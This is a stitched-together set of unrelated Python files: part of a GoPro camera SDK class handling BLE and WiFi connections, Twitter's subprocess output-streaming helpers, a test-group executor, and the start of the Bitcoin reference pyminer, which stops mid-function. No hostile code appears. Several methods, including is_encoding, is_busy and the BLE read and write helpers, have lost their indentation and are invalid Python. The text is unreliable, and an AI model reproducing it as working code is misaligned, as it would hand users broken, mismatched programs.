    def __del__(self) -> None:
        # Last-resort cleanup; close() guards against already-closed interfaces.
        self.close()

    @property
    def identifier(self) -> Optional[str]:
        """Get a unique identifier for this instance.

        The identifier is the last 4 digits of the camera. That is, the same string that is used to
        scan for the camera for BLE.

        If no target has been provided and a camera is not yet found, this will be None

        Returns:
            Optional[str]: last 4 digits if available, else None
        """
        return self._ble.identifier

    @property
    def is_ble_connected(self) -> bool:
        """Are we connected via BLE to the GoPro device?

        Returns:
            bool: True if yes, False if no
        """
        return self._ble.is_connected

    @property
    def is_wifi_connected(self) -> bool:
        """Are we connected via Wifi to the GoPro device?

        Returns:
            bool: True if yes, False if no
        """
        return self._wifi.is_connected
@property
def is_encoding(self) -> bool:
"""Is the camera currently encoding?
Returns:
bool: True if yes, False if no
"""
if not self._maintain_ble:
raise InvalidConfiguration("Not maintaining BLE state so encoding is not applicable")
return self._internal_state & GoPro._InternalState.ENCODING == 1
@property
def is_busy(self) -> bool:
"""Is the camera currently performing a task that prevents it from accepting commands?
Returns:
bool: True if yes, False if no
"""
if not self._maintain_ble:
raise InvalidConfiguration("Not maintaining BLE state so busy is not applicable")
return self._internal_state & GoPro._InternalState.SYSTEM_BUSY == 1
    @property
    def version(self) -> float:
        """The Open GoPro API version that the connected camera supports

        Only 2.0 is currently supported

        Returns:
            float: supported version in decimal form
        """
        return float(self._api.version)

    @property
    def ble_command(self) -> BleCommands:
        """Used to call the version-specific BLE commands

        Returns:
            BleCommands: the commands
        """
        return self._api.ble_command

    @property
    def ble_setting(self) -> BleSettings:
        """Used to access the version-specific BLE settings

        Returns:
            BleSettings: the settings
        """
        return self._api.ble_setting

    @property
    def ble_status(self) -> BleStatuses:
        """Used to access the version-specific BLE statuses

        Returns:
            BleStatuses: the statuses
        """
        return self._api.ble_status

    @property
    def wifi_command(self) -> WifiCommands:
        """Used to access the version-specific Wifi commands

        Returns:
            WifiCommands: the commands
        """
        return self._api.wifi_command

    @property
    def wifi_setting(self) -> WifiSettings:
        """Used to access the version-specific Wifi settings

        Returns:
            WifiSettings: the settings
        """
        return self._api.wifi_setting
    def open(self, timeout: int = 10, retries: int = 5) -> None:
        """Perform all initialization commands for ble and wifi

        For BLE: scan and find device, establish connection, discover characteristics, configure queries,
        start maintenance, and get Open GoPro version.

        For Wifi: discover SSID and password, enable and connect. Or disable if not using.

        Raises:
            Any exceptions during opening are propagated through

        Args:
            timeout (int, optional): How long to wait for each connection before timing out. Defaults to 10.
            retries (int, optional): How many connection attempts before considering connection failed. Defaults to 5.
        """
        try:
            # Establish BLE connection and start maintenance threads if desired
            self._open_ble(timeout, retries)
            # Find and configure API version
            version = self.ble_command.get_open_gopro_api_version().flatten
            version_str = f"{version.major}.{version.minor}"
            if version_str != "2.0":
                raise InvalidOpenGoProVersion(version)
            logger.info(f"Using Open GoPro API version {version_str}")
            # Establish Wifi connection if desired
            if self._enable_wifi_during_init:
                self._open_wifi(timeout, retries)
            else:
                # Otherwise, turn off Wifi
                logger.info("Turning off the camera's Wifi radio")
                self.ble_command.enable_wifi_ap(False)
        except Exception as e:
            # Fail closed: tear down any partially-opened connections before re-raising
            logger.error(f"Error while opening: {e}")
            self.close()
            raise e

    def close(self) -> None:
        """Safely stop the GoPro instance.

        This will disconnect BLE and WiFI if applicable.

        If not using the context manager, it is mandatory to call this before exiting the program in order to
        prevent reconnection issues because the OS has never disconnected from the previous session.
        """
        # Close Wifi before BLE
        self._close_wifi()
        self._close_ble()

    @ensure_initialized(Interface.BLE)
    def get_update(self, timeout: Optional[float] = None) -> GoProResp:
        """Get a notification that we received from a registered listener.

        If timeout is None, this will block until a notification is received.
        The updates are received via FIFO

        Args:
            timeout (Optional[float], optional): Time to wait for a notification before returning.
                Defaults to None (wait forever)

        Raises:
            queue.Empty: timeout expired with no notification available

        Returns:
            GoProResp: Received notification
        """
        return self._out_q.get(timeout=timeout)

    @ensure_initialized(Interface.BLE)
    def keep_alive(self) -> bool:
        """Send a heartbeat to prevent the BLE connection from dropping.

        This is sent automatically by the GoPro instance if its `maintain_ble` argument is not False.

        Returns:
            bool: True if it succeeded, False otherwise
        """
        return self.ble_setting.led.set(Params.LED.BLE_KEEP_ALIVE).is_ok

    ##########################################################################################################
    #                                        End Public API
    ##########################################################################################################
    @property
    def _is_ble_initialized(self) -> bool:
        """Have all BLE housekeeping threads completed their first ready cycle?

        Returns:
            bool: True if yes, False if no
        """
        return self._threads_waiting == 0

    def _maintain_state(self) -> None:
        """Thread to keep track of ready / encoding and acquire / release ready semaphore."""
        # Start "not ready": hold the semaphore until the camera reports a ready state
        self._ready.acquire()
        while self.is_ble_connected:
            internal_status_previous = self._internal_state
            # Block until _notification_handler signals a status change
            with self._state_condition:
                self._state_condition.wait()
            # If we were ready but now we're not, acquire the semaphore
            if internal_status_previous == 0 and self._internal_state != 0:
                logger.trace("Control acquiring semaphore")  # type: ignore
                self._ready.acquire()
                logger.trace("Control has semaphore")  # type: ignore
            # If we weren't ready but now we are, release the semaphore
            elif internal_status_previous != 0 and self._internal_state == 0:
                # If this is the first time, mark that we might now be initialized
                if not self._is_ble_initialized:
                    self._threads_waiting -= 1
                self._ready.release()
                logger.trace("Control released semaphore")  # type: ignore
        # NOTE(review): re-increments the waiting count on exit — presumably so a future
        # reconnect repeats the initialization accounting; confirm before relying on it.
        self._threads_waiting += 1
        logger.debug("Maintain state thread exiting...")

    def _periodic_keep_alive(self) -> None:
        """Thread to periodically send the keep alive message via BLE."""
        while self.is_ble_connected:
            if not self._is_ble_initialized:
                self._threads_waiting -= 1
            try:
                # Only sleep the full interval after a successful heartbeat
                if self.keep_alive():
                    time.sleep(KEEP_ALIVE_INTERVAL)
            except Exception:  # pylint: disable=broad-except
                # If the connection disconnects while we were trying to send, there can be any number
                # of exceptions. This is expected and this thread will exit on the next while check.
                pass
        self._threads_waiting += 1
        logger.debug("periodic keep alive thread exiting...")

    def _register_listener(self, producer: ProducerType) -> None:
        """Register a producer to store notifications from.

        The notifications can be accessed via the get_update() method.

        Args:
            producer (ProducerType): Producer to listen to.
        """
        self._listeners[producer] = True

    def _unregister_listener(self, producer: ProducerType) -> None:
        """Unregister a producer in order to stop listening to its notifications.

        Args:
            producer (ProducerType): Producer to stop listening to.
        """
        if producer in self._listeners:
            del self._listeners[producer]
    def _open_ble(self, timeout: int = 10, retries: int = 5) -> None:
        """Connect the instance to a device via BLE.

        Args:
            timeout (int, optional): Time in seconds before considering establishment failed. Defaults to 10 seconds.
            retries (int, optional): How many tries to reconnect after failures. Defaults to 5.

        Raises:
            ConnectFailed: Connection could not be established
        """
        # Establish connection, pair, etc.
        self._ble.open(timeout, retries)
        # Configure threads if desired
        if self._maintain_ble:
            self._state_thread.start()
            # Subscribe to the two statuses that drive the ready semaphore
            self.ble_status.encoding_active.register_value_update()
            self.ble_status.system_ready.register_value_update()
            self._keep_alive_thread.start()
        logger.info("BLE is ready!")

    # TODO refactor this into smaller methods
    def _notification_handler(self, handle: int, data: bytearray) -> None:
        """Receive notifications from the BLE controller.

        Args:
            handle (int): Attribute handle that notification was received on.
            data (bytearray): Bytestream that was received.
        """
        # Responses we don't care about. For now, just the BLE-spec defined battery characteristic
        if (uuid := self._ble.gatt_db.handle2uuid(handle)) == GoProUUIDs.BATT_LEVEL:
            return
        logger.debug(f'Received response on BleUUID [{uuid}]: {data.hex(":")}')
        # Add to response dict if not already there
        if uuid not in self._active_resp:
            self._active_resp[uuid] = GoProResp(self._parser_map, meta=[uuid])
        self._active_resp[uuid]._accumulate(data)
        if self._active_resp[uuid].is_received:
            response = self._active_resp[uuid]
            response._parse()
            # Handle internal statuses
            if self._maintain_ble:
                if (
                    response.cmd
                    in [
                        QueryCmdId.REG_STATUS_VAL_UPDATE,
                        QueryCmdId.GET_STATUS_VAL,
                        QueryCmdId.STATUS_VAL_PUSH,
                    ]
                    and StatusId.ENCODING in response.data
                ):
                    with self._state_condition:
                        if response[StatusId.ENCODING] is True:
                            self._internal_state |= GoPro._InternalState.ENCODING
                        else:
                            self._internal_state &= ~GoPro._InternalState.ENCODING
                        # Wake _maintain_state to re-evaluate readiness
                        self._state_condition.notify()
                if (
                    response.cmd
                    in [
                        QueryCmdId.REG_STATUS_VAL_UPDATE,
                        QueryCmdId.GET_STATUS_VAL,
                        QueryCmdId.STATUS_VAL_PUSH,
                    ]
                    and StatusId.SYSTEM_READY in response.data
                ):
                    with self._state_condition:
                        # SYSTEM_READY status is inverted into the SYSTEM_BUSY flag
                        if response[StatusId.SYSTEM_READY] is True:
                            self._internal_state &= ~GoPro._InternalState.SYSTEM_BUSY
                        else:
                            self._internal_state |= GoPro._InternalState.SYSTEM_BUSY
                        self._state_condition.notify()
            # Check if this is the awaited synchronous response (id matches). Note! these have to come in order.
            response_claimed = False
            if not self._sync_resp_wait_q.empty():
                queue_snapshot = self._sync_resp_wait_q.snapshot()
                if queue_snapshot[0].id is response.id:
                    # Dequeue it and put this on the ready queue
                    self._sync_resp_wait_q.get_nowait()
                    self._sync_resp_ready_q.put(response)
                    response_claimed = True
            # If this wasn't the awaited synchronous response...
            if not response_claimed:
                logger.info(build_log_rx_str(response, asynchronous=True))
                # See if there are any registered responses that need to be enqueued for client consumption
                for key in list(response.data.keys()):
                    if (response.cmd, key) not in self._listeners:
                        del response.data[key]
                # Enqueue the response if there is anything left
                if len(response.data) > 0:
                    self._out_q.put(response)
            # Clear active response from response dict
            del self._active_resp[uuid]

    def _close_ble(self) -> None:
        """Terminate the BLE connection and wait for the disconnect to be acknowledged."""
        if self.is_ble_connected and self._ble is not None:
            # Clear the disconnect event handler to allow disconnect handler to pass and reset
            self._ble_disconnect_event.clear()
            self._ble.close()
            # This waits on the disconnect handler to reset the disconnection event
            self._ble_disconnect_event.wait()

    def _disconnect_handler(self, _: Any) -> None:
        """Handle disconnects

        Raises:
            ConnectionTerminated: the BLE link dropped without ``_close_ble`` being called first
        """
        if self._ble_disconnect_event.is_set():
            raise ConnectionTerminated("BLE connection terminated unexpectedly.")
        self._ble_disconnect_event.set()
# TODO refactor to allow use of semaphore decorator which will require a state table for commands/ responses
@ensure_initialized(Interface.BLE)
def _write_characteristic_receive_notification(self, uuid: BleUUID, data: bytearray) -> GoProResp:
"""Perform a BLE write and wait for a corresponding notification response.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's API delegate (i.e. self)
Args:
uuid (BleUUID): BleUUID to write to
data (bytearray): data to write
Raises:
Exception: Unexpected functionality occurred
Returns:
GoProResp: parsed notification response data
"""
assert self._ble is not None
# Acquire ready semaphore unless we are initializing or this is a Set Shutter Off command
have_semaphore = False
if (
self._maintain_ble
and self._is_ble_initialized
and not (
GoProResp._from_write_command(self._parser_map, uuid, data).id is CmdId.SET_SHUTTER
and data[-1] == 0
)
):
logger.trace( # type: ignore
f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} acquiring semaphore"
)
self._ready.acquire()
logger.trace(f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} has semaphore") # type: ignore
have_semaphore = True
# Store information on the response we are expecting
self._sync_resp_wait_q.put(GoProResp._from_write_command(self._parser_map, uuid, data))
# Perform write
logger.debug(f"Writing to [{uuid.name}] UUID: {data.hex(':')}")
self._ble.write(uuid, data)
# Wait to be notified that response was received
try:
response: GoProResp = self._sync_resp_ready_q.get(timeout=WRITE_TIMEOUT)
except queue.Empty as e:
logger.error(f"Response timeout of {WRITE_TIMEOUT} seconds!")
raise ResponseTimeout(WRITE_TIMEOUT) from e
# Check status
if not response.is_ok:
logger.warning(f"Received non-success status: {response.status}")
if self._maintain_ble:
# If this was set shutter on, we need to wait to be notified that encoding has started
if response.cmd is CmdId.SET_SHUTTER and data[-1] == 1:
while not self.is_encoding:
# We don't want to use the application's loop, can't use any of our loops due to potential deadlock,
# and don't want to spawn a new thread for this. So just poll ¯\_(ツ)_/¯
# A read to an int is atomic anyway.
time.sleep(0.1)
# Release the semaphore if we acquired it
if have_semaphore:
self._ready.release()
logger.trace( # type: ignore
f"{GoProResp._from_write_command(self._parser_map, uuid, data).id} released the semaphore"
)
return response
@ensure_initialized(Interface.BLE)
@acquire_ready_semaphore
def _read_characteristic(self, uuid: BleUUID) -> GoProResp:
"""Read a characteristic's data by GoProUUIDs.
There should hopefully not be a scenario where this needs to be called directly as it is generally
called from the instance's delegates (i.e. self.command, self.setting, self.ble_status)
Args:
uuid (BleUUID): characteristic data to read
Returns:
bytearray: read data
"""
received_data = self._ble.read(uuid)
logger.debug(f"Reading from {uuid.name}")
return GoProResp._from_read_response(self._parser_map, uuid, received_data)
    @ensure_initialized(Interface.BLE)
    def _open_wifi(self, timeout: int = 15, retries: int = 5) -> None:
        """Connect to a GoPro device via Wifi.

        Args:
            timeout (int, optional): Time before considering establishment failed. Defaults to 15 seconds.
            retries (int, optional): How many tries to reconnect after failures. Defaults to 5.

        Raises:
            Exception: Wifi failed to connect.
        """
        logger.info("Discovering Wifi AP info and enabling via BLE")
        password = self.ble_command.get_wifi_password().flatten
        ssid = self.ble_command.get_wifi_ssid().flatten
        # The camera's access point must be up before the local machine can join it
        self.ble_command.enable_wifi_ap(True)
        self._wifi.open(ssid, password, timeout, retries)

    def _close_wifi(self) -> None:
        """Terminate the Wifi connection."""
        if hasattr(self, "_wifi"):  # Corner case where instantiation fails before superclass is initialized
            self._wifi.close()

    @ensure_initialized(Interface.WIFI)
    @acquire_ready_semaphore
    def _get(self, url: str) -> GoProResp:
        """Send an HTTP GET request to an Open GoPro endpoint.

        There should hopefully not be a scenario where this needs to be called directly as it is generally
        called from the instance's delegates (i.e. self.wifi_command and self.wifi_status)

        Args:
            url (str): endpoint URL

        Raises:
            ResponseTimeout: all HTTP_GET_RETRIES connection attempts failed

        Returns:
            GoProResp: response
        """
        if not self.is_wifi_connected:
            raise GoProNotInitialized("WiFi is not connected.")
        url = GoPro._base_url + url
        logger.debug(f"Sending: {url}")
        response: Optional[GoProResp] = None
        for retry in range(HTTP_GET_RETRIES):
            try:
                request = requests.get(url, timeout=GET_TIMEOUT)
                request.raise_for_status()
                response = GoProResp._from_http_response(self._parser_map, request)
                break
            except requests.exceptions.HTTPError as e:
                # The camera responded with an error. Break since we successfully sent the command and attempt
                # to continue
                logger.warning(e)
                response = GoProResp._from_http_response(self._parser_map, e.response)
                break
            except requests.exceptions.ConnectionError as e:
                logger.warning(repr(e))
                logger.warning("Retrying to send the command...")
                if retry == HTTP_GET_RETRIES - 1:
                    raise ResponseTimeout(HTTP_GET_RETRIES) from e
        assert response is not None
        return response
@ensure_initialized(Interface.WIFI)
@acquire_ready_semaphore
def _stream_to_file(self, url: str, file: Path) -> None:
    """Download a binary file from an Open GoPro endpoint via HTTP GET.

    There should hopefully not be a scenario where this needs to be called
    directly as it is generally called from the instance's delegates
    (i.e. self.wifi_command and self.wifi_status).

    Args:
        url (str): endpoint URL
        file (Path): location where file should be downloaded to
    """
    assert self.is_wifi_connected
    full_url = GoPro._base_url + url
    logger.debug(f"Sending: {full_url}")
    with requests.get(full_url, stream=True) as request:
        request.raise_for_status()
        with open(file, "wb") as out:
            logger.debug(f"receiving stream to {file}...")
            # Stream in 8 KiB chunks so large media never has to fit in memory.
            for chunk in request.iter_content(chunk_size=8192):
                out.write(chunk)
|
proc.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2017 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' proc.py: subprocess and subprocess's stdout/stderr management '''
from threading import Event, Thread
def _stream_process_fileno(fileno, handler):
""" Stream handling each line from fileno
:param filno: file object
:param handler: a function that will be called for each line from fileno
:return: None
"""
while 1:
line = fileno.readline()
handler(line)
if not line:
break
def stream_process_stdout(process, handler):
    """ Stream the stdout for a process out to display

    Reads ``process.stdout`` line by line until EOF; the empty EOF line is
    also passed to ``handler`` as an end-of-stream sentinel.

    :param process: the process to stream the stdout for
    :param handler: a function that will be called for each stdout line
    :return: None
    """
    stdout = process.stdout
    while True:
        line = stdout.readline()
        handler(line)
        if not line:
            break
def stream_process_stderr(process, handler):
    """ Stream the stderr for a process out to display

    Reads ``process.stderr`` line by line until EOF; the empty EOF line is
    also passed to ``handler`` as an end-of-stream sentinel.

    :param process: the process to stream the stderr for
    :param handler: a function that will be called for each stderr line
    :return: None
    """
    stderr = process.stderr
    while True:
        line = stderr.readline()
        handler(line)
        if not line:
            break
def _async_stream_process_output(process, stream_fn, handler):
""" Stream and handle the output of a process
:param process: the process to stream the output for
:param stream_fn: the function that applies handler to process
:param handler: a function that will be called for each log line
:return: None
"""
logging_thread = Thread(target=stream_fn, args=(process, handler, ))
# Setting the logging thread as a daemon thread will allow it to exit with the program
# rather than blocking the exit waiting for it to be handled manually.
logging_thread.daemon = True
logging_thread.start()
return logging_thread
def async_stream_process_stdout(process, handler):
    """ Stream and handle the stdout of a process on a background thread

    :param process: the process to stream the stdout for
    :param handler: a function that will be called to handle each line
    :return: the daemon Thread performing the streaming
    """
    return _async_stream_process_output(process, stream_process_stdout, handler)
def async_stream_process_stderr(process, handler):
    """ Stream and handle the stderr of a process on a background thread

    :param process: the process to stream the stderr for
    :param handler: a function that will be called to handle each line
    :return: the daemon Thread performing the streaming
    """
    return _async_stream_process_output(process, stream_process_stderr, handler)
class StringBuilder(object):
    """ Accumulates stream lines until the empty end-of-stream line is seen.

    ``add`` is intended as the handler for the stream helpers above: every
    truthy line is collected, and the empty line those helpers emit at EOF
    marks completion. ``result`` blocks until that EOF marker arrives, then
    returns the concatenated output.
    """

    def __init__(self):
        self.end = False   # True once the EOF sentinel has been seen
        self.strs = []     # collected lines, in arrival order
        # Event lets result() wait without burning CPU; the previous
        # implementation busy-spun on self.end, pegging a core until EOF.
        self._complete = Event()

    def add(self, line):
        """ Handler for stream lines; an empty/falsy line marks end of stream. """
        if not line:
            self.end = True
            self._complete.set()
        else:
            self.strs.append(line)

    def result(self):
        """ Block until the stream has ended, then return all output as one string. """
        self._complete.wait()
        return ''.join(self.strs)
def async_stdout_builder(proc):
    """ Save stdout into string builder

    :param proc: the process to save stdout for
    :return StringBuilder
    """
    builder = StringBuilder()
    async_stream_process_stdout(proc, builder.add)
    return builder
def async_stderr_builder(proc):
    """ Save stderr into string builder

    :param proc: the process to save stderr for
    :return StringBuilder
    """
    builder = StringBuilder()
    async_stream_process_stderr(proc, builder.add)
    return builder
def async_stdout_stderr_builder(proc):
    """ Save stdout and stderr into string builders

    :param proc: the process to save stdout and stderr for
    :return (StringBuilder, StringBuilder)
    """
    out_builder = async_stdout_builder(proc)
    err_builder = async_stderr_builder(proc)
    return out_builder, err_builder
|
executor.py | """
Driver of the test execution framework.
"""
from __future__ import absolute_import
import threading
import time
from . import fixtures
from . import hooks as _hooks
from . import job as _job
from . import report as _report
from . import testcases
from .. import config as _config
from .. import errors
from .. import logging
from .. import utils
from ..utils import queue as _queue
class TestGroupExecutor(object):
    """
    Executes a test group.

    Responsible for setting up and tearing down the fixtures that the
    tests execute against. One Job (fixture + hooks + report) is built
    per configured parallel job; each Job consumes tests from a shared
    queue on its own thread.
    """

    # Upper bound on waiting for the test queue to drain.
    _TIMEOUT = 24 * 60 * 60  # =1 day (a long time to have tests run)

    def __init__(self,
                 exec_logger,
                 test_group,
                 logging_config,
                 config=None,
                 fixture=None,
                 hooks=None):
        """
        Initializes the TestGroupExecutor with the test group to run.

        :param exec_logger: parent logger for this execution.
        :param test_group: the group of tests to run (provides test_kind,
            tests, and start/end bookkeeping).
        :param logging_config: logging configuration dict.
        :param config: per-test-case configuration (defaults to {}).
        :param fixture: fixture configuration; must contain a "class" key
            when provided.
        :param hooks: list of custom-behavior configurations (defaults to []).
        """
        # Build a logger for executing this group of tests.
        logger_name = "%s:%s" % (exec_logger.name, test_group.test_kind)
        self.logger = logging.loggers.new_logger(logger_name, parent=exec_logger)

        self.logging_config = logging_config
        self.fixture_config = fixture
        self.hooks_config = utils.default_if_none(hooks, [])
        self.test_config = utils.default_if_none(config, {})

        self._test_group = test_group

        self._using_buildlogger = logging.config.using_buildlogger(logging_config)
        self._build_config = None

        if self._using_buildlogger:
            self._build_config = logging.buildlogger.get_config()

        # Must be done after getting buildlogger configuration.
        self._jobs = [self._make_job(job_num) for job_num in xrange(_config.JOBS)]

    def run(self):
        """
        Executes the test group.

        Any exceptions that occur during setting up or tearing down a
        fixture are propagated. Sets self._test_group.return_code to
        0 on success, 1 on test failure, 2 on fixture setup/teardown
        failure.
        """
        self.logger.info("Starting execution of %ss...", self._test_group.test_kind)

        return_code = 0
        try:
            if not self._setup_fixtures():
                return_code = 2
                return

            num_repeats = _config.REPEAT
            while num_repeats > 0:
                test_queue = self._make_test_queue()
                self._test_group.record_start()
                (report, interrupted) = self._run_tests(test_queue)
                self._test_group.record_end(report)

                # If the user triggered a KeyboardInterrupt, then we should stop.
                if interrupted:
                    raise errors.UserInterrupt("Received interrupt from user")

                sb = []  # String builder.
                self._test_group.summarize_latest(sb)
                self.logger.info("Summary: %s", "\n ".join(sb))

                if not report.wasSuccessful():
                    return_code = 1
                    if _config.FAIL_FAST:
                        break

                # Clear the report so it can be reused for the next execution.
                for job in self._jobs:
                    job.report.reset()
                num_repeats -= 1
        finally:
            # Teardown runs even on interrupt; its failure trumps a test failure.
            if not self._teardown_fixtures():
                return_code = 2
            self._test_group.return_code = return_code

    def _setup_fixtures(self):
        """
        Sets up a fixture for each job.

        Returns True if every fixture started and became ready, False on
        the first error (which is logged, not raised).
        """
        # Start all fixtures first so they boot in parallel...
        for job in self._jobs:
            try:
                job.fixture.setup()
            except:
                self.logger.exception("Encountered an error while setting up %s.", job.fixture)
                return False

        # Once they have all been started, wait for them to become available.
        for job in self._jobs:
            try:
                job.fixture.await_ready()
            except:
                self.logger.exception("Encountered an error while waiting for %s to be ready",
                                      job.fixture)
                return False

        return True

    def _run_tests(self, test_queue):
        """
        Starts a thread for each Job instance and blocks until all of
        the tests are run.

        Returns a (combined report, user interrupted) pair, where the
        report contains the status and timing information of tests run
        by all of the threads.
        """
        threads = []
        interrupt_flag = threading.Event()
        user_interrupted = False
        try:
            # Run each Job instance in its own thread.
            for job in self._jobs:
                t = threading.Thread(target=job, args=(test_queue, interrupt_flag))
                # Do not wait for tests to finish executing if interrupted by the user.
                t.daemon = True
                t.start()
                threads.append(t)
                # SERVER-24729 Need to stagger when jobs start to reduce I/O load if there
                # are many of them. Both the 5 and the 10 are arbitrary.
                if len(threads) >= 5:
                    time.sleep(10)

            joined = False
            while not joined:
                # Need to pass a timeout to join() so that KeyboardInterrupt exceptions
                # are propagated.
                joined = test_queue.join(TestGroupExecutor._TIMEOUT)
        except (KeyboardInterrupt, SystemExit):
            interrupt_flag.set()
            user_interrupted = True
        else:
            # Only wait for all the Job instances if not interrupted by the user.
            for t in threads:
                t.join()

        reports = [job.report for job in self._jobs]
        combined_report = _report.TestReport.combine(*reports)

        # We cannot return 'interrupt_flag.is_set()' because the interrupt flag can be set by a Job
        # instance if a test fails and it decides to drain the queue. We only want to raise a
        # StopExecution exception in TestGroupExecutor.run() if the user triggered the interrupt.
        return (combined_report, user_interrupted)

    def _teardown_fixtures(self):
        """
        Tears down all of the fixtures.

        Returns true if all fixtures were torn down successfully, and
        false otherwise. Always attempts every fixture, even after a
        failure.
        """
        success = True
        for job in self._jobs:
            try:
                if not job.fixture.teardown():
                    self.logger.warn("Teardown of %s was not successful.", job.fixture)
                    success = False
            except:
                self.logger.exception("Encountered an error while tearing down %s.", job.fixture)
                success = False
        return success

    def _get_build_id(self, job_num):
        """
        Returns a unique build id for a job.

        Returns a (build_id, build_config) pair; build_id is None when
        buildlogger is not in use or could not be configured.
        """
        build_config = self._build_config

        if self._using_buildlogger:
            # Use a distinct "builder" for each job in order to separate their logs.
            if build_config is not None and "builder" in build_config:
                build_config = build_config.copy()
                build_config["builder"] = "%s_job%d" % (build_config["builder"], job_num)

            build_id = logging.buildlogger.new_build_id(build_config)
            if build_config is None or build_id is None:
                self.logger.info("Encountered an error configuring buildlogger for job #%d, falling"
                                 " back to stderr.", job_num)

            return build_id, build_config

        return None, build_config

    def _make_fixture(self, job_num, build_id, build_config):
        """
        Creates a fixture for a job.

        Falls back to the no-op fixture when no fixture was configured.
        """
        fixture_config = {}
        fixture_class = fixtures.NOOP_FIXTURE_CLASS

        if self.fixture_config is not None:
            fixture_config = self.fixture_config.copy()
            fixture_class = fixture_config.pop("class")

        logger_name = "%s:job%d" % (fixture_class, job_num)
        logger = logging.loggers.new_logger(logger_name, parent=logging.loggers.FIXTURE)
        logging.config.apply_buildlogger_global_handler(logger,
                                                        self.logging_config,
                                                        build_id=build_id,
                                                        build_config=build_config)

        return fixtures.make_fixture(fixture_class, logger, job_num, **fixture_config)

    def _make_hooks(self, job_num, fixture):
        """
        Creates the custom behaviors for the job's fixture.
        """
        behaviors = []

        for behavior_config in self.hooks_config:
            behavior_config = behavior_config.copy()
            behavior_class = behavior_config.pop("class")

            logger_name = "%s:job%d" % (behavior_class, job_num)
            logger = logging.loggers.new_logger(logger_name, parent=self.logger)
            behavior = _hooks.make_custom_behavior(behavior_class,
                                                   logger,
                                                   fixture,
                                                   **behavior_config)
            behaviors.append(behavior)

        return behaviors

    def _make_job(self, job_num):
        """
        Returns a Job instance with its own fixture, hooks, and test
        report.
        """
        build_id, build_config = self._get_build_id(job_num)
        fixture = self._make_fixture(job_num, build_id, build_config)
        hooks = self._make_hooks(job_num, fixture)

        logger_name = "%s:job%d" % (self.logger.name, job_num)
        logger = logging.loggers.new_logger(logger_name, parent=self.logger)

        if build_id is not None:
            endpoint = logging.buildlogger.APPEND_GLOBAL_LOGS_ENDPOINT % {"build_id": build_id}
            url = "%s/%s/" % (_config.BUILDLOGGER_URL.rstrip("/"), endpoint.strip("/"))
            logger.info("Writing output of job #%d to %s.", job_num, url)

        report = _report.TestReport(logger,
                                    self.logging_config,
                                    build_id=build_id,
                                    build_config=build_config)

        return _job.Job(logger, fixture, hooks, report)

    def _make_test_queue(self):
        """
        Returns a queue of TestCase instances.

        Use a multi-consumer queue instead of a unittest.TestSuite so
        that the test cases can be dispatched to multiple threads.
        """
        test_kind_logger = logging.loggers.new_logger(self._test_group.test_kind,
                                                      parent=logging.loggers.TESTS)

        # Put all the test cases in a queue.
        queue = _queue.Queue()
        for test_name in self._test_group.tests:
            test_case = testcases.make_test_case(self._test_group.test_kind,
                                                 test_kind_logger,
                                                 test_name,
                                                 **self.test_config)
            queue.put(test_case)

        # Add sentinel value for each job to indicate when there are no more items to process.
        for _ in xrange(_config.JOBS):
            queue.put(None)

        return queue
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
# Seconds to back off after an RPC failure before retrying.
ERR_SLEEP = 15
# Default upper bound of a nonce scan; retuned every iteration from the
# measured hash rate (see Miner.iterate).
MAX_NONCE = 1000000L

# Global key=value configuration parsed from the config file in __main__.
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node over HTTP basic auth."""

    # JSON-RPC request id. NOTE: `self.OBJID += 1` creates a per-instance
    # attribute shadowing this class attribute on first use.
    OBJID = 1

    def __init__(self, host, port, username, password):
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        # strict=False, 30 second timeout.
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        """POST a single JSON-RPC call and return its 'result' field.

        Returns the decoded 'error' object when the server reports one, or
        None on transport/decoding problems (errors are printed, not raised).
        """
        self.OBJID += 1
        obj = { 'version' : '1.1',
                'method' : method,
                'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
                          { 'Authorization' : self.authhdr,
                            'Content-type' : 'application/json' })

        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None

        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None

        return resp_obj['result']

    def getblockcount(self):
        """RPC wrapper: current block height."""
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        """RPC wrapper: fetch work (data=None) or submit a solved block."""
        return self.rpc('getwork', data)
def uint32(x):
    """Mask x down to its low 32 bits (unsigned 32-bit wrap).

    The Python 2-only ``L`` literal suffix was dropped; the mask value is
    identical, keeping the helper source-compatible with Python 3.
    """
    return x & 0xffffffff
def bytereverse(x):
    """Return the 32-bit word x with the order of its four bytes reversed."""
    swapped = ((x << 24)
               | ((x << 8) & 0x00ff0000)
               | ((x >> 8) & 0x0000ff00)
               | (x >> 24))
    # Final mask keeps the result inside 32 bits (inlined uint32).
    return swapped & 0xffffffff
def bufreverse(in_buf):
    """Byte-swap each 32-bit word of in_buf; length must be a multiple of 4.

    Unpacking and repacking with the same (native) endianness and reversing
    the packed bytes is exactly equivalent to repacking the byte-reversed
    word value.
    """
    swapped_words = []
    for offset in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[offset:offset + 4])[0]
